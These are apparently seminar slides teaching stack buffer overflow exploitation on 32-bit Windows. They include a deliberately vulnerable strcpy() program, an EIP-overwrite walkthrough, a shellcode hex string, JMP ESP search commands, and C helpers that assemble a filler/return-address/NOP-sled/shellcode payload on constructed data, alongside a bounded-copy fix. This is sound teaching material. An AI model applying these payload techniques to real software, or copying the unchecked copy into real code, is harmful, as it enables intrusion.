Hacking | Information Security Analysis
Hacking
Security Analysis
-- Build security with creativity
Danang Heriyadi (danang@hatsecure.com)
Hello World
Today
Hacking Incidents
Assets
Vulnerability Analysis
Top 3 - Hacking in action
Cyber Spying
Fraud or Forgery
Illegal Access
Cyber Spying

Fraud or Forgery

Illegal Access
How do they do it?
• Sensitive information disclosure
  – Search engines (Google, Bing, Yahoo)
  – Magazines
  – etc.
• Social engineering attacks
  – Target the knowledge and attitude of an organization's members regarding
    the protection of its information assets.
• Vulnerabilities in your system
  – The attacker exploits the vulnerability to gain access.

Google Hacking
What are you trying to protect?
• Sensitive personal data
• Your network infrastructure
• Your assets
Common Vulnerabilities
• Web
  – XSS
  – Database injection
  – OS command injection
  – Local file disclosure
  – File inclusion
  – Path disclosure
  – CSRF
  – Directory traversal
• Low-level vulnerabilities
  – Stack overflow
  – Heap overflow
  – Integer overflow
  – Memory corruption
  – etc.
Buffer Overflow
• Low-level vulnerabilities, with a rough exploitation difficulty:
  – Stack overflow (very easy)
  – Integer overflow (easy)
  – Heap overflow (medium)
  – Memory corruption (easy - medium)
  – .....
Impact of buffer overflow
• Application
  – Crash and termination
  – Arbitrary code execution
• Operating system
  – Crash, hang, or reboot
  – Arbitrary code execution
  – Privilege escalation
Basic Knowledge
• CPU registers (x86)
  – General purpose: EAX, EBX, ECX, EDX, ESI, EDI
  – Stack: EBP (frame base), ESP (stack top)
  – Instruction pointer: EIP (address of the next instruction to execute)
Basic Knowledge
• Assembly language
  – mov  (copy a value)
  – push / pop  (write to / read from the top of the stack)
  – shr  (shift right)
  – jmp  (jump to an address)
  – ret  (pop the saved return address into EIP)
Windows Memory Allocation

User-mode address space of a 32-bit Windows process, low addresses at the top:

  0x00000000
              Stack
              Heap
  0x00400000  Program Image
                • PE Header
                • .text, .rdata, .data, ...
              (free ranges here can be allocated as heap or stack for other threads)
              DLL
  0x7FFDF000  PEB
  0x7FFE0000  Shared User Page
  0x7FFE1000  No Access
  0xFFFFFFFF
C++ for beginners

#include <stdio.h>
#include <string.h>    /* strcpy() */

void vulnerable(char *Buffer){
    char stack_data[128];
    /* no length check: an argument longer than 127 bytes overflows stack_data */
    strcpy (stack_data, Buffer);
    printf( " Contents of variable stack_data : %s ", stack_data);
}

int main(int argc, char **argv){
    if (argc < 2) {          /* without an argument argv[1] is NULL */
        printf("usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    return 0;
}
Run it!!
Stack Allocation

The program above, stepped through one call at a time. Each step gives an
example EIP value and the state of the stack frame of vulnerable(); the
diagram keeps the top of the stack (low addresses, 0x00000000) at the top.

Step 1. CPU register (example): EIP = 0x01234567 => address of main()
  Stack: no frame for vulnerable() yet.
Step 2. EIP = 0x01234571 => address of vulnerable()
  Stack: unchanged.
Step 3. EIP = 0x01234585 => char stack_data[128]: 128 bytes reserved on the stack
Step 4. EIP = 0x01234544 => call strcpy()
  Stack (top = lowest address):
    ESP -> <space for stack_data>   128 bytes, not yet written
           Saved EBP   0x00112233
           Saved EIP   0x00112237   (return address into main)
           <ptr to argv[1]>         (argument Buffer, pushed by main)
Step 5. EIP = 0x01234548 => call printf()
  Stack:
    ESP -> stack_data   "ABCD"      (the argument fitted; the rest of the frame is intact)
           Saved EBP   0x00112233
           Saved EIP   0x00112237
           <ptr to argv[1]>
Step 6. EIP = 0x01234552 => ret: restore saved EIP -> EIP
  Stack (stack_data released):
    ESP -> Saved EBP   0x00112233   (restored into EBP)
           Saved EIP   0x00112237   (popped into EIP by ret)
           <ptr to argv[1]>
Step 7. EIP = 0x01234599 => exit(0)
  Stack: the frame of vulnerable() is gone.
    ESP -> <ptr to argv[1]>

Step 8. The program has finished; the stack diagram is empty again.
Stack Allocation (Stack Overflow)

The same program, now run with an argument far longer than 128 bytes: a
long run of the letter 'A' (0x41).

Step 1. EIP = 0x012345 => call strcpy()
  Stack (top = lowest address):
    ESP -> <space for stack_data>   128 bytes
           Saved EBP   0x00112233
           Saved EIP   0x00112237
           <ptr to argv[1]>
Step 2. EIP = 0x01234548 => call printf()
  strcpy() has copied the whole argument; it did not stop at 128 bytes:
    ESP -> stack_data   41 41 41 41 ... (128 bytes of 'A')
           Saved EBP   0x41414141   (was 0x00112233)
           Saved EIP   0x41414141   (was 0x00112237)
           41 41 41 41 ...           (rest of the input, past the saved EIP)
Step 3. EIP = 0x41414141 => ret: restore saved EIP -> EIP
  The saved EIP that ret pops is now 0x41414141, the attacker's bytes, not
  the return address into main (0x00112237).

Step 4. EIP = 0x41414141
  Access violation when executing at 0x41414141: nothing executable is
  mapped there, so the program crashes. Whoever controls those four bytes
  controls EIP.
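The code-level fix for the crash just shown, as an added example that is not part of the original slides: a bounded copy that checks the argument against the 128-byte buffer before copying, so a long input is rejected instead of overwriting the saved EBP and EIP. The function names (copy_bounded, safe, try_length) and the 512-byte scratch input are assumptions of this example.

```c
/* Added example, not code from the original slides: the bounded
 * counterpart of the slide's vulnerable().  The 128-byte stack buffer is
 * kept; the copy happens only after the length has been checked. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128

/* Copy src into dst only if it fits, NUL terminator included.
 * memchr() looks at no more than dst_size bytes of src, so a source with
 * no NUL in that range is rejected instead of being read to its end.
 * Returns 0 on success, -1 when the input is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)
        return -1;                              /* strlen(src) >= dst_size: would overflow */
    memcpy(dst, src, (size_t)(nul - src) + 1);  /* copies the NUL as well */
    return 0;
}

/* Same shape as the slide's vulnerable(), with the check in front of the
 * copy.  Returns 0 if the input was copied and printed, -1 if rejected. */
int safe(const char *Buffer) {
    char stack_data[BUF_SIZE];
    if (copy_bounded(stack_data, sizeof stack_data, Buffer) != 0) {
        fprintf(stderr, "input rejected: longer than %d bytes\n", BUF_SIZE - 1);
        return -1;
    }
    printf(" Contents of variable stack_data : %s ", stack_data);
    return 0;
}

/* Boundary probe: feed safe() a string of n 'A's (constructed input).
 * 127 fit (128 bytes with the NUL); 128 or more are rejected. */
int try_length(size_t n) {
    char input[512];
    if (n >= sizeof input)
        n = sizeof input - 1;
    memset(input, 'A', n);
    input[n] = '\0';
    return safe(input);
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    return safe(argv[1]) == 0 ? 0 : 2;
}
```

Run with a 200-character argument it prints the rejection message and exits with status 2 instead of crashing; 127 characters still fit, because the 128th byte is the NUL terminator.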
Stack Exploitation

Stack Exploitation (Stack Overflow)

The same frame as in the crash above, before and after the attacker replaces
the filler with a working payload (diagram: low addresses at the top).

Crash (input is all 'A'):
    ESP -> stack_data   41 41 41 41 ... (128 bytes)
           Saved EBP   0x41414141   (was 0x00112233)
           Saved EIP   0x41414141   (was 0x00112237)
           41 41 41 41 ...           (rest of the input)

Exploit:
           stack_data   41 41 41 41 ... (128 bytes of filler)
           Saved EBP   0x41414141   (was 0x00112233)
           Saved EIP   0x80221122   (was 0x00112237) - address of a JMP ESP instruction
    ESP after ret -> shellcode:
           31c031db31c931d2eb16bfea07457e50535150ffd75950684141414189e3ebeae8f0ffffff48656c6c6f776f726c64

When vulnerable() returns, the overwritten saved EIP sends execution to the
JMP ESP. At that moment ESP points just past the saved EIP, i.e. at the
shellcode, which therefore runs.
Shellcode
• A small piece of code used as the payload in the exploitation of a
  software vulnerability
• Why is our shellcode not working?
  – Bad characters (bytes the input path cannot carry, e.g. 0x00 when the
    copy is done by strcpy())
  – Too big for the available space
Stack Exploitation (Stack Overflow)
• Fuzzing technique
  – Detecting the buffer overflow
  – Finding the offset at which the input overwrites the saved EBP and EIP
• Find a JMP ESP
  windbg command > lm m user32
  windbg command > s -b 7xxxxx 7xxxxx ff e4      (ff e4 is the opcode for JMP ESP)
• Generate shellcode
  – msfvenom
  – by hand :-P
• Finishing the exploit
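The procedure above and the bad-character question from the Shellcode slide, worked through in C as an added example (not code from the original slides): a cyclic pattern and offset lookup for the fuzzing step, a scan for the ff e4 opcode for the JMP ESP step, a bad-character check for the payload, and the final [filler][return address][NOP sled][shellcode] layout. The module bytes, the base address 0x77d11234, the crash value 0x41346541 (chosen so the offset comes out as 132: the 128-byte stack_data plus the 4-byte saved EBP of the frame drawn above) and the 0xCC int3 bytes standing in for shellcode are all constructed for this example; nothing is sent to a target.

```c
/* Added example, not code from the original slides.  The slide's procedure
 * (fuzz for the offset, find JMP ESP, check for bad characters, assemble
 * the payload) as plain C helpers over constructed data only: module_bytes,
 * MODULE_BASE, the crash value and the 0xCC stand-in shellcode are made up. */
#include <stdint.h>
#include <string.h>

/* Fuzzing, part 1: a non-repeating pattern (Aa0Aa1...Aa9Ab0..., the scheme
 * used by Metasploit's pattern_create) so the bytes landing in EIP identify
 * their own offset.  Plain 'A's (EIP = 0x41414141) cannot. */
size_t pattern_create(char *out, size_t len) {
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < len; u++)
        for (char l = 'a'; l <= 'z' && i < len; l++)
            for (char d = '0'; d <= '9' && i < len; d++) {
                const char chunk[3] = { u, l, d };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = chunk[k];
            }
    return i;
}

/* Fuzzing, part 2: the EIP value at the crash, read as a little-endian
 * dword, is four consecutive pattern bytes; their index is the offset of
 * the saved EIP in the input.  Returns -1 if the value is not in the pattern. */
long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    char needle[4];
    for (int k = 0; k < 4; k++)
        needle[k] = (char)((eip >> (8 * k)) & 0xff);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Find JMP ESP: scan a module's bytes for the opcode ff e4, the same search
 * the slide does in windbg with "s -b <start> <end> ff e4".
 * Returns the address of the first hit, or 0 if there is none. */
uint32_t find_jmp_esp(const uint8_t *module, size_t len, uint32_t base) {
    for (size_t i = 0; i + 2 <= len; i++)
        if (module[i] == 0xff && module[i + 1] == 0xe4)
            return base + (uint32_t)i;
    return 0;
}

/* Bad characters: the input reaches stack_data through strcpy(), which stops
 * at the first 0x00, so a NUL anywhere in the payload (return address
 * included) truncates it.  Returns the index of the first byte that is in
 * the bad list, or -1 if the buffer is clean. */
long first_bad_char(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad) {
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Finishing the exploit: [filler up to saved EIP][JMP ESP address, little
 * endian][NOP sled][shellcode].  After the overwritten ret, ESP points just
 * past the saved EIP, so the JMP ESP lands on the sled and slides into the
 * shellcode.  Returns the payload length, or 0 if it does not fit in out. */
size_t build_payload(uint8_t *out, size_t cap, size_t offset, uint32_t ret,
                     const uint8_t *sc, size_t sclen) {
    const size_t sled = 16;
    size_t total = offset + 4 + sled + sclen;
    if (total > cap)
        return 0;
    memset(out, 'A', offset);
    for (int k = 0; k < 4; k++)                  /* x86 is little-endian */
        out[offset + k] = (uint8_t)(ret >> (8 * k));
    memset(out + offset + 4, 0x90, sled);        /* NOP sled */
    memcpy(out + offset + 4 + sled, sc, sclen);
    return total;
}

/* Constructed "module": a few bytes with one ff e4 at offset 4. */
static const uint8_t module_bytes[] = { 0x55, 0x8b, 0xec, 0x90, 0xff, 0xe4, 0xc3 };
#define MODULE_BASE 0x77d11234u   /* made-up base; hit at 0x77d11238, no zero byte */
static const uint8_t bad_chars[] = { 0x00 };

/* Offset lookup for a given crash value against a 200-byte pattern. */
long demo_pattern_offset(uint32_t crash_eip) {
    char pat[200];
    pattern_create(pat, sizeof pat);
    return pattern_offset(pat, sizeof pat, crash_eip);
}

/* All steps on the constructed data.  Returns the payload length, or 0 if
 * any step fails (no offset, no JMP ESP, payload too big, bad char present). */
size_t demo_payload_len(void) {
    /* Pretend the fuzzing crash showed EIP = 0x41346541, the bytes "Ae4A",
     * which sit at offset 132 of the pattern: 128 bytes of stack_data plus
     * the 4-byte saved EBP, matching the frame drawn on the slides. */
    long off = demo_pattern_offset(0x41346541u);
    if (off < 0)
        return 0;
    uint32_t ret = find_jmp_esp(module_bytes, sizeof module_bytes, MODULE_BASE);
    if (ret == 0)
        return 0;
    const uint8_t sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };   /* int3 x4: stand-in, not shellcode */
    uint8_t payload[256];
    size_t n = build_payload(payload, sizeof payload, (size_t)off, ret, sc, sizeof sc);
    if (n == 0 || first_bad_char(payload, n, bad_chars, sizeof bad_chars) >= 0)
        return 0;
    return n;
}
```

The same check that rejects a 0x00 in the shellcode also has to cover the return address: an address such as 0x00401234 would be cut off by strcpy() after its first byte, which is why the JMP ESP is looked for in a module loaded at an address without zero bytes.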
Mitigation and Technique
(mitigation introduced -> bypass technique used against it)
• Windows XP
  – Hardware DEP -> ROP shellcode
• Windows Vista
  – ASLR -> static addresses in shared data memory
  – DEP -> ROP shellcode
• Windows 7
  – ASLR + DEP -> ROP / JIT ROP / JIT ROP spraying
• Windows 8
  – ASLR + DEP (new) -> ROP / JIT ROP

Seminar Hacking & Security Analysis
